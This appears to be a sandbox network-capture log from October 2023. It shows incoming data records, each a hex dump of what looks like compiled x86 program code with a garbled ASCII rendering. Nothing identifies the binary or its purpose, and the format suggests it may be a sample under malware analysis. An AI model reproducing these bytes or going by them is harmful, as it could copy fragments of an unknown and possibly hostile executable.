2023-10-05 16:48:06 UTC	336	IN	Data Raw: 31 e1 e8 ba 97 04 00 8b 04 24 83 c4 10 5e 5f 5b 5d c3 ff 77 08 68 be 0b 4f 00 ff b6 b4 00 00 00 e8 0c 15 fd ff 83 c4 0c eb d2 cc cc cc cc cc cc cc 53 57 56 80 79 10 00 0f 85 52 01 00 00 89 ce 8b 19 8b 49 14 89 c8 f7 d0 a8 05 74 24 89 c8 83 e0 04 c1 e8 02 83 e1 01 8b 56 1c 8b 3a 50 51 52 ff 57 1c 83 c4 0c 8b 4e 14 84 c0 0f 84 8b 00 00 00 f6 c1 02 0f 85 82 00 00 00 f6 c1 01 75 3c 8b 83 8c 00 00 00 8b 00 6a 18 ff 50 0c 83 c4 04 89 c7 83 c0 30 ff 76 04 50 e8 94 3f fe ff 83 c4 08 83 c7 20 57 ff b3 94 00 00 00 e8 e2 7b ff ff 83 c4 08 8b 4e 14 83 c9 01 89 4e 14 f6 c1 04 74 3c 8b 83 8c 00 00 00 8b 00 6a 19 ff 50 0c 83 c4 04 89 c7 83 c0 30 ff 76 04 50 e8 53 3f fe ff 83 c4 08 83 c7 20 57 ff b3 94 00 00 00 e8 a1 7b ff ff 83 c4 08 8b 4e 14 83 c9 02 89 4e 14 f7 d1 f6 Data Ascii: 1$^_[]whOSWVyRIt$V:PQRWNu<jP0vP? W{NNt<jP0vPS? W{NN
2023-10-05 16:48:06 UTC	344	IN	Data Raw: 83 c4 04 8d 7c 24 18 6a 20 57 ff 73 04 e8 af 1f fe ff 83 c4 0c 8b 6c 24 04 8d 45 64 6a 10 50 ff 73 04 e8 9a 1f fe ff 83 c4 0c 8b 03 57 53 ff 50 0c 83 c4 08 8b 03 53 ff 50 10 83 c4 04 8b 85 5c 01 00 00 8b 00 6a 08 ff 50 0c 83 c4 04 89 c3 83 c0 30 6a 10 57 50 e8 66 1f fe ff 83 c4 0c 83 c3 20 53 ff b5 64 01 00 00 e8 e4 5c ff ff 83 c4 08 c6 45 15 00 ff 34 24 e8 25 25 01 00 83 c4 04 56 e8 1c 25 01 00 83 c4 04 c7 45 00 16 03 00 00 8b 5c 24 50 53 e8 58 73 ff ff 83 c4 04 84 c0 0f 85 86 e8 ff ff 8b 85 60 01 00 00 6a 01 50 50 ff 50 18 83 c4 0c 85 c0 0f 84 6e e8 ff ff 89 c6 8b 00 83 f8 0f 0f 85 81 08 00 00 8b 85 7c 01 00 00 8b 08 50 ff 51 64 83 c4 04 84 c0 0f 84 1f f4 ff ff 68 77 0f 4f 00 e8 d7 1c fe ff 83 c4 04 50 53 e8 5d 6a ff ff 83 c4 08 e9 03 f4 ff ff 80 bd 54 Data Ascii: \|$j Wsl$EdjPsWSPSP\jP0jWPf Sd\E4$%%V%E\$PSXs`jPPPn\|PQdhwOPS]jT
2023-10-05 16:48:06 UTC	352	IN	Data Raw: 8b 68 24 89 6c 24 08 8b 47 04 89 44 24 0c 85 db 7e 21 8d 6f 30 31 f6 90 90 90 90 90 90 90 90 90 90 6a 00 55 e8 d8 00 fe ff 83 c4 08 83 c6 01 39 de 7c ee 8b 47 10 8b 6c 24 0c 01 e8 53 50 e8 5e 01 fd ff 83 c4 08 8b 47 10 88 58 04 8b 0c 24 01 e9 8b 47 10 89 0c 24 0f c9 89 08 8b 74 24 04 8b 46 54 85 c0 74 17 8b 08 f6 41 34 02 74 0f ff 76 50 6a 04 ff 77 10 50 ff 51 18 83 c4 10 01 dd 8d 47 30 6a 00 ff 74 24 0c 50 e8 03 00 fe ff 83 c4 0c 8b 46 58 85 c0 74 45 80 7e 5c 00 74 2f 8b 4e 54 85 c9 74 16 8b 47 10 83 c0 04 8b 11 ff 34 24 50 51 ff 52 10 83 c4 0c 8b 46 58 ff 76 50 55 ff 77 10 50 e8 19 74 02 00 83 c4 10 eb 24 ff 76 50 55 ff 77 10 50 e8 07 74 02 00 83 c4 10 8b 46 54 85 c0 74 23 8b 08 55 ff 77 10 50 ff 51 10 83 c4 0c 8b 46 54 83 46 50 01 85 c0 74 0f 8b 08 50 Data Ascii: h$l$GD$~!o01jU9\|Gl$SP^GX$G$t$FTtA4tvPjwPQG0jt$PFXtE~\t/NTtG4$PQRFXvPUwPt$vPUwPtFTt#UwPQFTFPtP
2023-10-05 16:48:06 UTC	360	IN	Data Raw: 45 24 8b 08 6a 01 50 ff 51 58 83 c4 08 53 e8 8e ad 00 00 83 c4 04 57 50 68 56 04 4e 00 e8 1f df fd ff 83 c4 0c eb 3f c6 45 f5 01 68 25 4a 4e 00 e8 0c df fd ff 83 c4 04 50 ff 75 20 e8 40 a8 fc ff 83 c4 08 80 be 64 01 00 00 00 75 5f eb 30 83 78 0c 00 0f 85 0f 07 00 00 68 e4 49 4e 00 e8 de de fd ff 83 c4 04 50 ff 75 20 e8 12 a8 fc ff 83 c4 08 c6 45 f5 00 80 be 64 01 00 00 00 75 2d 8b 86 8c 01 00 00 8b 08 6a 01 6a 00 50 ff 51 54 83 c4 0c 89 86 60 01 00 00 85 c0 74 09 50 e8 ff f6 fd ff 83 c4 04 c6 86 64 01 00 00 01 c7 06 46 06 00 00 8b 04 24 8b 00 90 90 90 90 90 90 90 90 90 90 6a 00 50 50 ff 50 18 83 c4 0c 85 c0 74 26 83 38 35 75 21 89 f1 89 c2 e8 04 28 00 00 8b 86 70 01 00 00 6a 01 50 50 ff 50 18 83 c4 0c 8b 86 70 01 00 00 eb cc 8b 04 24 8b 00 6a 01 50 50 ff Data Ascii: E$jPQXSWPhVN?Eh%JNPu @du_0xhINPu Edu-jjPQT`tPdF$jPPPt&85u!(pjPPPp$jPP
2023-10-05 16:48:06 UTC	368	IN	Data Raw: 00 89 d8 83 c4 14 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 53 57 56 83 ec 24 89 d6 89 cf 8b 5c 24 40 8b 54 24 3c 8b 4c 24 38 8b 87 a4 00 00 00 85 c0 0f 84 b9 03 00 00 89 74 24 1c 8b 70 04 8b 68 08 52 51 e8 6a 61 00 00 83 c4 08 89 44 24 18 e8 ae cf fd ff 89 44 24 0c 8b 87 a8 00 00 00 85 c0 75 0b e8 9b cf fd ff 89 87 a8 00 00 00 ff 74 24 44 53 ff 70 08 ff 70 04 e8 15 cc fd ff 83 c4 10 88 44 24 03 84 c0 75 27 6a 00 ff b7 a8 00 00 00 e8 cd ce fd ff 83 c4 08 8b 87 a8 00 00 00 83 c0 0c ff 74 24 44 53 50 e8 56 c1 fd ff 83 c4 0c 55 56 e8 6c 63 00 00 83 c4 08 89 c3 85 c0 0f 84 3d 01 00 00 80 7b 6c 00 0f 84 54 01 00 00 55 56 53 ff 13 83 c4 0c 85 c0 89 44 24 20 0f 84 5c 01 00 00 89 7c 24 10 89 c5 e8 16 cf fd ff 89 c7 8d 70 0c 8b 45 00 55 ff 50 34 83 c4 04 8b 08 56 50 ff Data Ascii: ^_[]USWV$\$@T$<L$8t$phRQjaD$D$ut$DSppD$u'jt$DSPVUVlc={lTUVSD$ \\|$pEUP4VP
2023-10-05 16:48:06 UTC	375	IN	Data Raw: 00 00 51 ff b7 94 01 00 00 ff 76 04 52 50 89 f3 89 ee ff 75 04 8b 6c 24 20 ff 75 04 ff b7 88 01 00 00 ff b7 5c 03 00 00 e8 64 91 ff ff 83 c4 24 55 e8 4b b1 fd ff 83 c4 04 56 e8 42 b1 fd ff 83 c4 04 53 e8 39 b1 fd ff 83 c4 04 ff b7 6c 01 00 00 e8 2b b1 fd ff 83 c4 04 c7 87 6c 01 00 00 00 00 00 00 8b 87 7c 03 00 00 8b 08 50 ff 51 24 83 c4 04 8b 87 18 01 00 00 85 c0 0f 84 8d 16 00 00 50 68 c7 13 4e 00 e8 36 a0 fd ff 83 c4 08 50 8b b4 24 70 01 00 00 ff 76 20 e8 63 69 fc ff 83 c4 08 c7 86 c0 fd ff ff 00 00 00 00 80 bf 5f 02 00 00 00 0f 85 bc 00 00 00 6a 2c ff 77 50 e8 af 8d fd ff 83 c4 08 84 c0 0f 84 a7 00 00 00 83 7f 60 05 74 0c 89 f9 ba 01 00 00 00 e8 02 1e 00 00 8b 8f 28 01 00 00 89 ca 80 e2 01 31 c0 f6 c1 08 0f b6 ca 0f 44 c1 80 bf 61 02 00 00 00 8b 57 50 Data Ascii: QvRPul$ u\d$UKVBS9l+l\|PQ$PhN6P$pv ci_j,wP`t(1DaWP
2023-10-05 16:48:06 UTC	383	IN	Data Raw: 24 01 00 00 83 78 08 00 0f 84 67 01 00 00 8b 40 04 8d 7c 24 20 8d 4c 24 0c 57 51 50 ff 50 1c 83 c4 0c 85 c0 0f 85 a1 01 00 00 89 5c 24 08 c7 44 24 18 00 00 00 00 c7 44 24 1c 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 14 00 00 00 00 8b 86 24 01 00 00 8b 4c 24 20 23 4c 24 24 31 d2 83 f9 ff 8d 9e 38 01 00 00 0f 44 d7 8b 48 04 8d 7c 24 18 89 5c 24 04 53 52 57 8d 54 24 1c 52 6a 00 ff 70 08 8d 5c 24 24 53 51 ff 51 14 83 c4 20 89 c7 83 7c 24 0c 00 74 11 8b 86 24 01 00 00 8b 40 04 53 50 ff 50 20 83 c4 08 83 ff 02 8b 44 24 08 0f 83 e8 00 00 00 83 7c 24 18 00 74 15 8b 86 24 01 00 00 8b 40 04 8d 4c 24 18 51 50 ff 50 18 83 c4 08 8b 86 28 01 00 00 8b 8e 38 01 00 00 89 c2 83 ca 01 89 96 28 01 00 00 83 f9 04 77 09 83 c8 09 89 86 28 01 00 00 6a 2d ff 76 50 e8 31 6e fd Data Ascii: $xg@\|$ L$WQPP\$D$D$D$D$$L$ #L$$18DH\|$\$SRWT$Rjp\$$SQQ \|$t$@SPP D$\|$t$@L$QPP(8(w(j-vP1n
2023-10-05 16:48:06 UTC	391	IN	Data Raw: ff 83 c4 08 85 c0 74 43 89 c6 8b 54 24 10 89 c1 83 c1 0c 57 ff 74 24 18 6a 00 6a 00 e8 50 fd ff ff 83 c4 10 89 c7 ff 76 08 ff 36 e8 01 38 00 00 83 c4 08 6a 20 56 e8 f6 37 00 00 83 c4 08 56 e8 cd 6c fd ff 83 c4 04 89 f8 eb 02 31 c0 5e 5f c3 cc 53 56 83 ec 08 8b 44 24 14 8b 0d 34 00 50 00 31 e1 89 4c 24 04 6a 00 50 e8 53 fc ff ff 83 c4 08 85 c0 74 45 89 c6 89 c1 83 c1 0c 89 e0 31 d2 50 6a 00 ff 74 24 20 6a 00 e8 e3 fc ff ff 83 c4 10 83 f8 01 0f 94 c3 ff 76 08 ff 36 e8 90 37 00 00 83 c4 08 6a 20 56 e8 85 37 00 00 83 c4 08 56 e8 5c 6c fd ff 83 c4 04 eb 02 31 db 8b 4c 24 04 31 e1 e8 3a bc 03 00 89 d8 83 c4 08 5e 5b c3 cc cc 55 53 57 56 83 ec 34 8b 74 24 48 a1 34 00 50 00 31 e0 89 44 24 30 c7 44 24 04 00 00 00 00 6a 21 ff 76 10 e8 68 67 fd ff 83 c4 08 8b 4e 10 Data Ascii: tCT$Wt$jjPv68j V7Vl1^_SVD$4P1L$jPStE1Pjt$ jv67j V7V\l1L$1:^[USWV4t$H4P1D$0D$j!vhgN
2023-10-05 16:48:06 UTC	399	IN	Data Raw: fd ff 83 c4 08 8b 4e 10 83 79 0c 00 75 20 be 02 00 00 00 52 50 6a 21 68 ef 13 4f 00 e8 70 4f fd ff 83 c4 10 84 c0 0f 85 39 02 00 00 8b 0f 6a 00 51 e8 ab 4c fd ff 83 c4 08 6a 1a ff 37 e8 df 48 fd ff 83 c4 08 8b 0f 83 79 0c 00 75 20 be 09 00 00 00 52 50 6a 1a 68 5a 80 4e 00 e8 31 4f fd ff 83 c4 10 84 c0 0f 85 fa 01 00 00 8b 0f 6a 00 51 e8 6c 4c fd ff 83 c4 08 6a 14 ff 37 e8 a0 48 fd ff 83 c4 08 8b 0f 83 79 0c 00 75 20 be 03 00 00 00 52 50 6a 14 68 bc e4 4e 00 e8 f2 4e fd ff 83 c4 10 84 c0 0f 85 bb 01 00 00 8b 0f 6a 00 51 e8 2d 4c fd ff 83 c4 08 6a 1e ff 37 e8 61 48 fd ff 83 c4 08 8b 0f 83 79 0c 00 75 20 be 06 00 00 00 52 50 6a 1e 68 3b 80 4e 00 e8 b3 4e fd ff 83 c4 10 84 c0 0f 85 7c 01 00 00 8b 0f 6a 00 51 e8 ee 4b fd ff 83 c4 08 6a 0b ff 37 e8 22 48 fd ff Data Ascii: Nyu RPj!hOpO9jQLj7Hyu RPjhZN1OjQlLj7Hyu RPjhNNjQ-Lj7aHyu RPjh;NN\|jQKj7"H
2023-10-05 16:48:06 UTC	407	IN	Data Raw: 15 8d 7c 24 0c 6a 00 6a 00 6a 01 6a 00 ff 15 4c d9 4f 00 89 04 24 8d 45 24 89 44 24 08 8d 45 04 89 44 24 04 8b 35 f8 d9 4f 00 eb 4f 90 90 90 90 90 89 5d 28 89 cb 68 e0 33 50 00 ff 15 80 d9 4f 00 c7 45 04 d8 33 50 00 a1 dc 33 50 00 89 45 08 8b 4c 24 04 89 08 8b 45 04 89 48 04 ff 35 60 00 50 00 ff 15 0c db 4f 00 68 e0 33 50 00 ff 15 a4 da 4f 00 84 db 0f 84 dd 00 00 00 6a ff ff 75 0c ff 15 44 db 4f 00 80 7d 11 00 0f 85 8b 00 00 00 85 ff 74 21 c7 47 0c 00 00 00 00 c7 47 08 00 00 00 00 c7 47 04 00 00 00 00 c7 07 00 00 00 00 8b 04 24 89 47 10 57 ff 74 24 0c ff 75 20 ff 75 1c ff 75 00 ff 15 54 db 4f 00 b1 01 31 db 85 c0 0f 85 5c ff ff ff 89 f3 ff d6 89 45 28 85 ff 74 34 ff d3 31 db 3d e5 03 00 00 0f 85 47 ff ff ff 6a 01 ff 74 24 0c 57 ff 75 00 ff 15 1c da 4f 00 Data Ascii: \|$jjjjLO$E$D$ED$5OO](h3POE3P3PEL$EH5`POh3POjuDO}t!GGG$GWt$u uuTO1\E(t41=Gjt$WuO
2023-10-05 16:48:06 UTC	414	IN	Data Raw: 4d 0f fd ff 83 c4 04 56 e8 44 0f fd ff 83 c4 04 31 c0 5e 5f 5b 5d c3 8b 44 24 28 ff 30 e8 2f 0f fd ff 83 c4 04 8b 44 24 28 89 18 8b 44 24 24 89 28 56 e8 1a 0f fd ff 83 c4 04 57 e8 81 6f 02 00 83 c4 04 b8 01 00 00 00 eb c8 8b 44 24 28 ff 30 e8 fc 0e fd ff 83 c4 04 8b 44 24 28 89 18 8b 44 24 24 89 28 56 e8 e7 0e fd ff 83 c4 04 57 ff 15 ec da 4f 00 57 ff 15 40 d9 4f 00 b8 02 00 00 00 eb 90 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 64 8b 9c 24 8c 00 00 00 8b bc 24 88 00 00 00 8b ac 24 84 00 00 00 a1 34 00 50 00 31 e0 89 44 24 60 8b 04 ad e4 84 4d 00 89 44 24 18 50 e8 f8 94 04 00 83 c4 04 8d 48 03 83 e1 fc 83 fd 01 89 44 24 0c 75 0a 89 de 89 3c 24 e9 ba 00 00 00 8d 54 24 20 89 14 24 31 f6 83 fd 02 0f 85 a8 00 00 00 83 fb 10 0f 85 9f 00 00 Data Ascii: MVD1^_[]D$(0/D$(D$$(VWoD$(0D$(D$$(VWOW@OUSWVd$$$4P1D$`MD$PHD$u<$T$ $1
2023-10-05 16:48:06 UTC	422	IN	Data Raw: ff 83 c4 20 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 53 57 56 83 ec 0c 8b 6c 24 24 8b 5d 00 85 db 74 22 31 d2 b9 ff ff ff ff 8b 75 04 83 fb 01 75 22 b8 ff ff ff ff f6 c3 01 0f 85 8d 00 00 00 e9 9c 00 00 00 b9 ff ff ff ff b8 e1 ff ff ff e9 93 00 00 00 89 5c 24 04 83 e3 fe 89 5c 24 08 b8 ff ff ff ff 31 ed 89 34 24 90 90 90 90 90 90 90 90 8b 3c ae 89 fe d1 ee 89 fb 83 e3 01 09 f3 0f 45 cf be 00 00 00 00 0f 45 d6 8b 34 24 8b 74 ae 04 89 c7 0f 45 fd 89 f0 d1 e8 89 f3 83 e3 01 09 c3 0f 45 ce 8b 34 24 8d 45 01 0f 44 c7 bf 00 00 00 00 0f 45 d7 83 c5 02 3b 6c 24 08 75 b3 89 ea 8b 6c 24 24 8b 5c 24 04 f6 c3 01 74 14 8b 34 96 89 f7 d1 ef 89 f3 83 e3 01 09 fb 0f 45 c2 0f 45 ce c1 e0 05 83 c8 01 8b 7c 24 20 89 ce c1 ee 10 31 d2 81 f9 00 00 01 00 0f 93 c2 0f 42 f1 c1 Data Ascii: ^_[]USWVl$$]t"1uu"\$\$14$<EE4$tEE4$EDE;l$ul$$\$t4EE\|$ 1B
2023-10-05 16:48:06 UTC	430	IN	Data Raw: 10 8d 34 88 83 c6 04 31 c0 b9 01 00 00 00 8b 5c 24 18 eb 18 90 90 90 90 90 90 90 90 90 90 90 90 90 88 d1 83 c0 02 89 ea 39 c5 74 35 8b 7c 86 fc f7 d7 31 d2 01 cf 0f 92 c1 85 db 74 04 89 7c 86 fc 88 ca 8b 3c 86 f7 d7 31 c9 01 d7 0f 92 c2 85 db 74 ce 89 3c 86 eb c9 90 90 90 90 90 90 90 90 90 8b 7c 24 34 8b 74 24 0c f6 44 24 04 01 74 0e 85 db 74 0a 8b 14 86 f7 d2 01 d1 89 0c 86 8b 6c 24 28 8b 74 24 4c 39 ee 73 19 68 bb 02 00 00 68 f4 33 4f 00 68 24 17 4f 00 e8 e6 17 04 00 83 c4 0c 89 f5 8b 44 24 24 8b 4c 24 08 8d 34 81 89 6c 24 50 89 74 24 54 8d 4c 24 50 8d 54 24 70 53 57 8d 44 24 60 50 e8 37 ee ff ff 83 c4 0c 8b 54 24 14 39 ea 89 eb 73 31 b8 ff ff ff ff 8b 0c 24 d3 e0 f7 d0 21 04 96 8d 42 01 39 d8 73 1b 8d 04 96 83 c0 04 89 d1 f7 d1 01 d9 c1 e1 02 51 6a 00 Data Ascii: 41\$9t5\|1t\|<1t<\|$4t$D$ttl$(t$L9shh3Oh$OD$$L$4l$Pt$TL$PT$pSWD$`P7T$9s1$!B9sQj
2023-10-05 16:48:06 UTC	438	IN	Data Raw: 4c 24 0c 8b 49 04 8b 0c 81 31 d2 39 07 76 d2 8b 57 04 8b 14 82 eb ca 8b 4c 24 2c 85 c9 8b 7c 24 08 74 42 8b 01 8b 54 24 08 8b 3a 39 f8 0f 42 f8 8d 34 bd 00 00 00 00 56 8b 44 24 0c ff 70 04 ff 71 04 89 cd e8 18 29 03 00 83 c4 0c 8b 45 00 29 f8 8b 7c 24 08 c1 e0 02 03 75 04 50 56 e8 4f 7c ff ff 83 c4 08 8b 4c 24 30 85 c9 74 3e 8b 01 8b 54 24 0c 8b 3a 39 f8 0f 42 f8 8d 34 bd 00 00 00 00 56 ff 72 04 ff 71 04 89 cd e8 d2 28 03 00 83 c4 0c 8b 45 00 29 f8 8b 7c 24 08 c1 e0 02 03 75 04 50 56 e8 09 7c ff ff 83 c4 08 8b 03 c1 e0 02 50 ff 73 04 e8 f8 7b ff ff 83 c4 08 6a 08 53 e8 ed 7b ff ff 83 c4 08 53 e8 c4 b0 fc ff 83 c4 04 8b 34 24 8b 06 c1 e0 02 50 ff 76 04 e8 d0 7b ff ff 83 c4 08 6a 08 56 e8 c5 7b ff ff 83 c4 08 56 e8 9c b0 fc ff 83 c4 04 8b 07 c1 e0 02 50 ff Data Ascii: L$I19vWL$,\|$tBT$:9B4VD$pq)E)\|$uPVO\|L$0t>T$:9B4Vrq(E)\|$uPV\|Ps{jS{S4$Pv{jV{VP
2023-10-05 16:48:06 UTC	446	IN	Data Raw: 90 8b 74 85 04 31 d6 21 fe 31 d6 89 74 85 04 83 c1 01 3b 4c 24 3c 8b 34 24 0f 84 f2 00 00 00 89 c8 b9 00 00 00 00 39 c6 76 08 8b 4c 24 14 8b 4c 81 fc 8b 54 85 00 31 ca 21 fa 31 ca 89 54 85 00 8d 48 01 31 d2 39 ce 76 b8 8b 54 24 14 8b 14 82 eb af 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 16 83 fa 03 bb 02 00 00 00 0f 43 da 89 5c 24 0c 83 e3 fe 31 c9 31 f6 eb 0f 90 90 90 90 90 90 09 e9 83 c6 01 39 de 74 37 89 f7 be 00 00 00 00 39 fa 76 0a 8b 74 24 74 8b 76 04 8b 34 be 09 f1 8d 77 01 31 ed 39 f2 76 d7 8b 6c 24 74 8b 6d 04 8b 6c bd 04 eb ca 90 90 90 90 90 90 90 90 90 90 f6 44 24 0c 01 74 16 8d 5f 02 31 f6 39 da 76 0b 8b 54 24 74 8b 52 04 8b 74 ba 08 09 f1 8b 5c 24 08 8b 6c 24 18 85 c0 0f 94 c0 89 ca d1 ea 83 e1 01 09 d1 0f 94 c1 08 c1 0f b6 c1 8b 4c 24 Data Ascii: t1!1t;L$<4$9vL$LT1!1TH19vT$C\$119t79vt$tv4w19vl$tmlD$t_19vT$tRt\$l$L$
2023-10-05 16:48:06 UTC	453	IN	Data Raw: b7 03 00 83 c4 08 85 c0 0f 84 67 02 00 00 8b 03 68 e6 3c 4e 00 ff 30 e8 5a b7 03 00 83 c4 08 85 c0 0f 84 07 03 00 00 8b 03 68 0d 32 4e 00 ff 30 e8 41 b7 03 00 83 c4 08 85 c0 0f 84 6e 03 00 00 8b 46 0c 68 71 1c 4e 00 ff 30 e8 27 b7 03 00 83 c4 08 89 c3 89 f1 ba 3d 00 00 00 e8 e1 09 00 00 85 db 0f 84 ee 03 00 00 84 c0 8b 34 24 8b 5c 24 04 0f 84 2f 04 00 00 89 f1 e8 53 0a 00 00 84 c0 0f 85 fd 00 00 00 89 f1 e8 f4 08 00 00 84 c0 0f 85 ee 00 00 00 e9 0c 04 00 00 8b 6e 08 8b 46 14 8b 55 08 39 d0 73 28 8b 75 00 0f b6 0c 06 80 c1 f7 0f b6 d9 80 f9 17 77 16 b9 03 00 80 00 0f a3 d9 73 0c 83 c0 01 39 c2 75 e0 e9 f4 03 00 00 39 d0 0f 84 ec 03 00 00 8b 4d 00 80 3c 01 3d 0f 85 df 03 00 00 83 c0 01 8b 0c 24 89 41 14 e8 df 09 00 00 84 c0 0f 84 c9 03 00 00 8b 5c 24 04 8b Data Ascii: gh<N0Zh2N0AnFhqN0'=4$\$/SnFU9s(uws9u9M<=$A\$
2023-10-05 16:48:06 UTC	461	IN	Data Raw: 08 eb de 6a 5d 68 60 53 4f 00 68 8e 67 4f 00 e8 70 9b 03 00 83 c4 0c c7 06 02 00 00 00 c7 46 08 10 00 00 00 6a 00 6a 01 6a 10 e8 12 53 fc ff 83 c4 0c 89 46 04 6a 00 6a 01 6a 08 e8 01 53 fc ff 83 c4 0c 89 46 14 c7 00 00 00 00 00 c7 40 04 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 6a 0f ff 76 04 e8 b6 4b fb ff 83 c4 08 8b 46 04 0f b6 48 08 88 48 0f 8b 46 04 c6 40 08 00 8b 46 04 8b 4e 14 8b 10 8b 40 04 89 41 04 89 11 8b 46 04 83 c0 09 6a 08 ff 76 14 50 e8 f1 b9 01 00 83 c4 0c 56 53 e8 d7 64 fc ff 83 c4 08 39 f0 75 b0 68 f0 40 47 00 e8 26 64 fc ff 83 c4 04 89 c7 89 7e 18 8b 06 ff 34 85 e4 84 4d 00 e8 b0 a9 fc ff 83 c4 04 89 46 0c 8b 46 08 01 c0 83 c0 01 6a 00 6a 01 50 e8 58 52 fc ff 83 c4 0c 89 46 10 83 7e 08 00 7e 52 8b 4e 04 0f b6 09 51 68 ea de Data Ascii: j]h`SOhgOpFjjjSFjjjSF@jvKFHHF@FN@AFjvPVSd9uh@G&d~4MFFjjPXRF~~RNQh
2023-10-05 16:48:06 UTC	469	IN	Data Raw: ad 2c fc ff 83 c4 08 6a 00 53 e8 e2 2c fc ff 83 c4 08 8b 47 e4 8b 08 ff 76 08 ff 76 04 50 ff 51 08 83 c4 0c 56 e8 57 3a fc ff 83 c4 04 8b 47 e4 8b 08 50 ff 51 04 83 c4 04 ff 77 f0 e8 50 34 fc ff 83 c4 04 8b 47 f8 85 c0 74 09 50 e8 30 3a fc ff 83 c4 04 ff 34 24 e8 35 34 fc ff 83 c4 04 8b 4c 24 24 31 e1 e8 17 84 02 00 83 c4 28 5e 5f 5b 5d c3 68 f5 00 00 00 68 de 52 4f 00 68 54 8d 4f 00 e8 be 7b 03 00 83 c4 0c e8 b3 0a f9 ff cc cc cc 8b 44 24 04 8b 40 dc 85 c0 74 0d 8b 08 ff 74 24 08 50 ff 51 0c 83 c4 08 c3 cc cc cc cc cc cc cc 56 8b 74 24 08 81 3e 78 52 4d 00 74 17 68 81 02 00 00 68 de 52 4f 00 68 06 19 4f 00 e8 72 7b 03 00 83 c4 0c 8b 46 e0 8b 08 50 ff 51 04 83 c4 04 ff 76 ec e8 a8 33 fc ff 83 c4 04 8b 46 f4 85 c0 74 09 50 e8 88 39 fc ff 83 c4 04 83 c6 d8 Data Ascii: ,jS,GvvPQVW:GPQwP4GtP0:4$54L$$1(^_[]hhROhTO{D$@tt$PQVt$>xRMthhROhOr{FPQv3FtP9
2023-10-05 16:48:06 UTC	477	IN	Data Raw: bd e9 fa ff 83 c4 08 56 68 01 7a 4e 00 e8 6f 0a fc ff 83 c4 08 89 c6 bf 49 fd 4e 00 b8 dc 14 4f 00 80 7c 24 20 00 0f 44 f8 85 db 89 d9 bb e4 01 4f 00 0f 44 d8 8b 55 d4 89 14 24 bd e2 01 4f 00 0f 44 e8 51 e8 98 d8 fe ff 83 c4 04 55 ff 74 24 28 50 53 57 56 68 14 05 4e 00 e8 22 0a fc ff 83 c4 1c 50 8b 44 24 04 ff 70 20 e8 52 d3 fa ff 83 c4 08 56 e8 d9 14 fc ff 83 c4 04 b0 01 83 c4 04 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 53 57 56 8a 5c 24 18 8b 6c 24 14 81 7d 00 f8 52 4d 00 74 17 68 db 00 00 00 68 40 44 4f 00 68 7e 18 4f 00 e8 4a 5c 03 00 83 c4 0c 8d 75 cc 8b 7d d4 80 7d e1 00 74 30 c6 46 15 00 84 db 74 3d 68 a9 74 4e 00 e8 a6 09 fc ff 83 c4 04 50 ff 77 20 e8 da d2 fa ff 83 c4 08 8b 46 0c 8b 48 04 50 ff 51 54 83 c4 04 eb 66 80 7e 16 00 74 16 Data Ascii: VhzNoINO\|$ DODU$ODQUt$(PSWVhN"PD$p RV^_[]USWV\$l$}RMthh@DOh~OJ\u}}t0Ft=htNPw FHPQTf~t
2023-10-05 16:48:06 UTC	485	IN	Data Raw: 00 00 8b 8b f0 7f ff ff 0f b7 d1 89 93 98 7e ff ff 83 c0 f0 89 83 f4 7f ff ff c1 e9 10 89 8b f0 7f ff ff c7 83 70 7e ff ff 0b 00 00 00 8b 3c 24 e9 ac fa ff ff 83 f8 10 0f 8c 66 03 00 00 8b 8b 98 7e ff ff 8b 93 f0 7f ff ff 89 d6 f7 d6 83 c0 f0 89 83 f4 7f ff ff c1 ea 10 89 93 f0 7f ff ff 0f b7 c6 39 c1 0f 85 61 03 00 00 85 c9 74 12 c7 83 70 7e ff ff 0c 00 00 00 8b 3c 24 e9 60 fa ff ff c7 83 70 7e ff ff 01 00 00 00 8b 3c 24 e9 4e fa ff ff 83 f8 08 0f 8c 08 03 00 00 0f b6 83 f0 7f ff ff 8b 4b f8 88 84 0b f8 7f ff ff 8b 4b f8 8b 53 fc 83 c1 01 81 e1 ff 7f 00 00 89 4b f8 83 c2 0c 50 52 e8 f8 ec fb ff 83 c4 08 83 83 f4 7f ff ff f8 c1 ab f0 7f ff ff 08 83 83 98 7e ff ff ff 8b 3c 24 0f 85 f7 f9 ff ff c7 83 70 7e ff ff 01 00 00 00 e9 e8 f9 ff ff 8b 4c 24 1c e8 bf Data Ascii: ~p~<$f~9atp~<$`p~<$NKKSKPR~<$p~L$
2023-10-05 16:48:06 UTC	493	IN	Data Raw: 0c ff 77 08 68 ae f3 4d 00 56 e8 12 5d 01 00 83 c4 0c ff 77 0c 68 a7 e9 4d 00 56 e8 01 5d 01 00 83 c4 0c 8b 47 10 85 c0 74 42 50 68 96 e9 4d 00 56 e8 eb 5c 01 00 83 c4 0c ff 77 14 68 fb 1c 4e 00 56 e8 da 5c 01 00 83 c4 0c ff 77 18 68 75 1b 4e 00 56 e8 c9 5c 01 00 83 c4 0c ff 77 1c 68 05 1d 4e 00 56 e8 b8 5c 01 00 83 c4 0c 89 f0 5e 5f c3 55 53 57 56 83 ec 14 8b 74 24 30 8b 7c 24 2c 8b 46 04 8d 4f 04 39 c8 0f 8c 62 01 00 00 89 4c 24 08 8b 6c 24 28 89 44 24 0c 01 e8 29 f8 57 55 50 e8 fb 4d 02 00 83 c4 0c 66 c7 45 00 00 02 8b 46 04 29 f8 8d 1c c5 68 00 00 00 8d 04 c5 70 00 00 00 50 e8 a9 d1 fe ff 83 c4 04 89 c6 68 a0 8b 42 00 89 5c 24 04 53 e8 25 45 ff ff 83 c4 08 89 c3 50 56 e8 a9 d2 fe ff 83 c4 08 53 8b 5c 24 34 e8 ec d2 fe ff 83 c4 04 f7 d7 8b 43 04 89 7c Data Ascii: whMV]whMV]GtBPhMV\whNV\whuNV\whNV\^_USWVt$0\|$,FO9bL$l$(D$)WUPMfEF)hpPhB\$S%EPVS\$4C\|
